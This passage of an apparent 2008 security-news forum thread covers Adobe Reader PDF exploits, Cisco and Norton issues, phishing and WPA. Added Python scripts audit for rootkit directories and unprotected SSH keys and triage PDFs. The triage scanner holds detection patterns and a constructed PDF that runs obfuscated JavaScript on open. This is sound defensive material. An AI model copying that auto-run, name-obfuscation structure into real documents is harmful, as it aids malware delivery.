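    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n"
            "-----END OPENSSH PRIVATE KEY-----\n" % b64).encode()


SAMPLE_PLAIN_KEY = _constructed_openssh_key(b"none")
SAMPLE_ENCRYPTED_KEY = _constructed_openssh_key(b"aes256-ctr")
SAMPLE_PEM_ENCRYPTED = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                        b"DEK-Info: AES-128-CBC,00\n\nAAAA\n-----END RSA PRIVATE KEY-----\n")

if __name__ == "__main__":
    for d in PHALANX2_DIRS:
        print(d, "HIDDEN DIRECTORY" if hidden_but_enterable(d) else "not present or visible")
    print("/etc hidden subdirs (None = filesystem gives no link-count info):",
          count_hidden_subdirs("/etc"))
    print("SSH keys without passphrase:", unprotected_keys())
```

Run it as root so /etc and every user's .ssh directory are readable, and remember that a rootkit which hooks stat() as well as readdir() defeats the first check; that is why US-CERT also suggests looking for hidden processes and why offline inspection from clean media remains the reliable answer.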

AplusWebMaster
2008-09-08, 20:02
FYI...

- http://preview.tinyurl.com/5e65le
September 5, 2008 (Computerworld) - "...Symantec urged users* of Norton Internet Security 2008 to first update to Version 15.5, which in turn would allow them to download and install a Firefox 3.0 compatibility update. A separate Firefox 3.0 compatibility patch is available for Norton 360**. Both patches can be obtained by launching Symantec's Live Update feature from within the security applications. This wouldn't be the first time that Symantec's Norton software has created problems for other vendors.."

* http://community.norton.com/norton/board/message?board.id=nis_feedback&thread.id=3365

** http://community.norton.com/norton/board/message?board.id=Norton_360&thread.id=1475

:thud: :sad:

AplusWebMaster
2008-09-12, 18:00
FYI...

Vista 'BSOD' caused by iTunes 8.0
- http://preview.tinyurl.com/4xaol6
September 11, 2008 (Computerworld) - "Apple Inc.'s latest version of iTunes crashes Windows Vista when an iPod or iPhone is connected to the PC, scores of users have reported on Apple's support forum..."


:fear:

AplusWebMaster
2008-09-25, 06:30
FYI...

Cisco - multiple alerts
- http://www.us-cert.gov/current/#cisco_releases_security_alerts
September 24, 2008 - "Cisco has released multiple security alerts to address vulnerabilities in the Unified Communications Manager and IOS. These vulnerabilities may allow a remote unauthenticated attacker to cause a denial-of-service condition, obtain sensitive information, or operate with escalated privileges..."

Direct links available here:
- http://www.cisco.com/en/US/products/products_security_advisories_listing.html
(See those dtd. 24-Sept-2008)

Cisco IOS multiple vulnerabilities
- http://secunia.com/advisories/31990/
Release Date: 2008-09-25
Critical: Moderately critical

ISC analysis
- http://isc.sans.org/diary.html?storyid=5078
Last Updated: 2008-09-26 03:16:41 UTC

:fear:

AplusWebMaster
2008-09-26, 17:42
FYI...

- http://www.us-cert.gov/current/#adobe_pdf_exploit_toolkits_circulating
September 25, 2008 - "US-CERT is aware of public reports* of improved attack toolkits for exploiting vulnerabilities in PDF reader software..."

* http://www.trustedsource.org/blog/153/Rise-Of-The-PDF-Exploits
September 22, 2008 - "...Secure Computing... spotted a new and yet unknown exploit toolkit which exclusively targets Adobe’s PDF format. This toolkit is dubbed the “PDF Xploit Pack”... This new toolkit targets only PDFs, no other exploits are used to leverage vulnerabilities. Typical functions like caching the already infected users are deployed by this toolkit on the server-side. Whenever a malicious PDF exploit is successfully delivered, the victim’s IP address is remembered for a certain period of time. During this “ban time” the exploit is not delivered to that IP again, which is another burden for incident handling. Other existing toolkits have also been enhanced with PDF exploits lately..."

** http://www.trustedsource.org/blog/118/Recent-Adobe-Reader-vulnerability-exploited-in-the-wild
"...users should make sure to upgrade to Adobe Reader 8.1.2*** as soon as possible..."
*** http://www.adobe.com/support/security/#readerwin

:fear:

AplusWebMaster
2008-10-10, 18:07
FYI...

- http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt089.shtm
October 2008 - "If the recent changes in the financial marketplace have you confused, you’re not alone. The financial institution where you did business last week may have a new name today, and your checks and statements may come with a new look tomorrow. A new lender may have acquired your mortgage, and you could be mailing your payments to a new servicer. Procedures for the banking you do online also may have changed. According to the Federal Trade Commission (FTC), the nation’s consumer protection agency, the upheaval in the financial marketplace may spur scam artists to phish for your personal information.
Phishers may send attention-getting emails that look like they’re coming from the financial institution that recently acquired your bank, savings and loan, or mortgage. Their intent is to collect or capture your personal information, like your credit card numbers, bank account information, Social Security number, passwords, or other sensitive information. Their messages may ask you to “update,” “validate,” or “confirm” your account information..."

(More detail at the URL above.)

:fear::fear:

AplusWebMaster
2008-11-07, 18:54
FYI... http://isc.sans.org/diary.html?storyid=5312
Last Updated: 2008-11-07 15:54:09 UTC - "...at the time of writing this article, according to VirusTotal 0 (yes – ZERO) AV products detected this malicious PDF. Very, very bad. The payload is in a JavaScript object embedded in the PDF document... if you haven't patched your Adobe Reader installations – do it ASAP as the attacks are in the wild."
---

Security Update available for Adobe Reader 8 and Acrobat 8
- http://www.adobe.com/support/security/bulletins/apsb08-19.html
Release date: November 4, 2008
Vulnerability identifier: APSB08-19 ...
Platform: All Platforms
Summary:
Critical vulnerabilities have been identified in Adobe Reader and Acrobat 8.1.2 and earlier versions. These vulnerabilities would cause the application to crash and could potentially allow an attacker to take control of the affected system.
Adobe Reader 9 and Acrobat 9 are -not- vulnerable to these issues.
Adobe recommends users of Acrobat 8 and Adobe Reader 8 who can’t update to Adobe Reader 9 install the 8.1.3 update to protect themselves from potential vulnerabilities...

Adobe Reader:
> Adobe recommends Adobe Reader users update to Adobe Reader 9, available here:
http://www.adobe.com/go/getreader [AdbeRdr90_en_US.exe]
> Users with Adobe Reader 8.0 through 8.1.2, who can’t update to Adobe Reader 9, should update to Adobe Reader 8.1.3:
http://www.adobe.com/products/acrobat/readstep2_allversions.html [AdbeRdr813_en_US.exe] ..."

- http://secunia.com/advisories/29773
Last Update: 2008-11-05
Critical: Highly critical
Impact: Privilege escalation, System access
Where: From remote
Solution Status: Vendor Patch
Software: Adobe Acrobat 3D 8.x, Adobe Acrobat 8 Professional, Adobe Acrobat 8.x. Adobe Reader 8.x
Solution: Upgrade to version 9 or update to version 8.1.3...

:fear::fear:

---
If you were thinking of replacing your Adobe Reader with Foxit, -now- would be the time...

Adobe Reader v9... 33.5MB
- http://www.adobe.com/go/getreader
-OR-
- http://www.foxitsoftware.com/downloads/
Latest version: Foxit Reader 2.3 (.exe) 2.3 Build 3309 - 2.57 MB - 10/14/08

- http://asert.arbornetworks.com/2008/11/pdf-exploit-in-the-wild-and-how-to-decode/
November 7th, 2008 - "...We keep seeing Acrobat get hosed with JS exploits, this won't be the last time."

:wink:
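
Added example, not part of the post above and not code from SANS ISC, Arbor, Adobe or F-Secure: a triage scanner for PDFs of the kind described in the ISC and Arbor posts above and in the F-Secure analysis earlier in this thread, where the payload sits in a JavaScript object wired to run on open and the exploit drops a decoy document plus an executable. It normalises #XX-escaped names (so /J#61vaScript cannot hide from a keyword search), inflates FlateDecode streams so compressed objects are searched too, and flags the long %u-string unescape() pattern that heap-spray shellcode loaders use. Both sample PDFs are constructed byte strings, not real malware, and the %u9090 filler is not shellcode; the keyword list and wording are this example's own.

```python
"""Triage scanner for PDFs of the kind described in the ISC, Arbor and F-Secure
posts in this thread: the payload sits in a JavaScript object that runs on
open, and the exploit drops a decoy document plus an executable. Added example
written for this thread, not code from any of those vendors; both sample PDFs
are constructed byte strings, not real malware, and the %u filler is not
shellcode."""
import re
import sys
import zlib

# Name objects worth a second look. PDF syntax allows any byte in a name to be
# written as #XX, so /JavaScript can be spelled /J#61vaScript: normalise first.
SUSPICIOUS_NAMES = {
    b"/JavaScript": "JavaScript action",
    b"/JS": "JavaScript code object",
    b"/OpenAction": "action that runs when the document is opened",
    b"/AA": "additional (automatic) actions",
    b"/Launch": "Launch action (can start an external program)",
    b"/EmbeddedFile": "embedded file (possible dropped payload or decoy)",
}
_HEAP_SPRAY = re.compile(rb"unescape\s*\(\s*['\"](%u[0-9a-fA-F]{4}){8,}")


def normalise_names(data):
    """Decode #XX escapes so keyword matching cannot be dodged by /J#61vaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data):
    """Concatenate every stream that inflates with zlib (FlateDecode), so
    keywords hidden inside compressed objects are seen as well."""
    out = []
    for m in re.finditer(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue
    return b"\n".join(out)


def triage_pdf(data):
    """Return human-readable findings for one PDF given as bytes ([] = nothing seen)."""
    findings = []
    if not data.startswith(b"%PDF-"):
        findings.append("no %PDF- header at offset 0")
    views = [normalise_names(data), normalise_names(inflate_streams(data))]
    for name, why in SUSPICIOUS_NAMES.items():
        if any(re.search(re.escape(name) + rb"(?![A-Za-z])", v) for v in views):
            findings.append("%s: %s" % (name.decode(), why))
    if any(_HEAP_SPRAY.search(v) for v in views):
        findings.append("unescape() of a long %u string: typical shellcode/heap-spray pattern")
    return findings


def _constructed_pdf(with_exploit_chain):
    """Build a tiny single-page PDF; optionally add an OpenAction that runs
    FlateDecode-compressed JavaScript via an escaped /J#61vaScript name."""
    objs = [b"1 0 obj << /Type /Catalog /Pages 2 0 R" +
            (b" /OpenAction 4 0 R" if with_exploit_chain else b"") + b" >> endobj",
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
            b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj"]
    if with_exploit_chain:
        js = zlib.compress(b"var s = unescape('" + b"%u9090" * 8 + b"'); // constructed filler")
        objs += [b"4 0 obj << /S /J#61vaScript /JS 5 0 R >> endobj",
                 b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(js)
                 + js + b"\nendstream\nendobj"]
    return b"%PDF-1.4\n" + b"\n".join(objs) + b"\ntrailer << /Root 1 0 R >>\n%%EOF\n"


CLEAN_PDF = _constructed_pdf(with_exploit_chain=False)
MALICIOUS_PDF = _constructed_pdf(with_exploit_chain=True)

if __name__ == "__main__":
    targets = sys.argv[1:]
    if not targets:
        for label, blob in (("clean sample", CLEAN_PDF), ("malicious sample", MALICIOUS_PDF)):
            print(label, "->", triage_pdf(blob) or ["nothing suspicious"])
    for path in targets:
        with open(path, "rb") as f:
            print(path, "->", triage_pdf(f.read()) or ["nothing suspicious"])
```

Usage: python pdf_triage.py suspect.pdf. A hit on /OpenAction together with /JavaScript is the combination the analysts above were looking at by hand and is reason enough to pull the file into a sandbox; a clean result only means none of these markers were found, since the scanner does not follow object streams (/ObjStm) or non-Flate filters.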

AplusWebMaster
2008-11-11, 23:32
More PDF exploits...

- http://blog.trendmicro.com/adobe-reader-vulnerability-actively-being-exploited/
Nov. 11, 2008 - "Several active exploits targeting a vulnerability in Adobe Reader are now in the wild... Users with unpatched Adobe Reader software may be infected when they unknowingly access a certain remote website or are redirected there from malicious banners and ads. Upon execution, TROJ_PIDIEF.CB could crash Reader and then allow a malicious user to take control of an affected system. This compromises system security and exposes it to more threats as malicious users could easily dump adware and malicious programs..."

:fear::spider:

AplusWebMaster
2008-11-18, 13:26
FYI...

Adobe Reader v9 users w/AIR v1.1 installed
- http://isc.sans.org/diary.html?storyid=5363
Last Updated: 2008-11-17 22:21:15 UTC - "...Adobe has released a bulletin and update to Adobe AIR* that they classify as critical. It fixes some of the same vulnerabilities announced earlier in Flash player. Time to update if you are using AIR..."
* http://www.adobe.com/support/security/bulletins/apsb08-23.html

> http://get.adobe.com/air/
Adobe AIR v1.5 Installer
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5108

- http://secunia.com/advisories/32772/
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

:fear:

AplusWebMaster
2008-11-19, 21:13
FYI...

How to Protect Your Wi-Fi Network from the WPA Hack
- http://lifehacker.com/5079721/how-to-protect-your-wi+fi-network-from-the-wpa-hack
Nov 7 2008 - "WEP Wi-Fi security has been known as an easy-to-crack security protocol for a while now, which is why it was superseded by the more secure Wi-Fi Protected Access (WPA) standard. But now a PhD candidate studying encryption has found an exploit in the WPA standard that would allow a hacker to "send bogus data to an unsuspecting WiFi client," completely compromising your Wi-Fi security and opening your network to all sorts of hacking. Lucky for you, it's not terribly difficult to protect yourself against the new exploit.
The key: Just log into your router, switch off Temporal Key Integrity Protocol (TKIP) as an encryption mode, and use Advanced Encryption System (AES) only. TKIP is the only protocol that the hack applies to, so switching to AES-only will ensure that your Wi-Fi network is safe again. It's quick and easy, so do yourself a favor and make the adjustment now so you don't run into any problems in the future."

:bigthumb: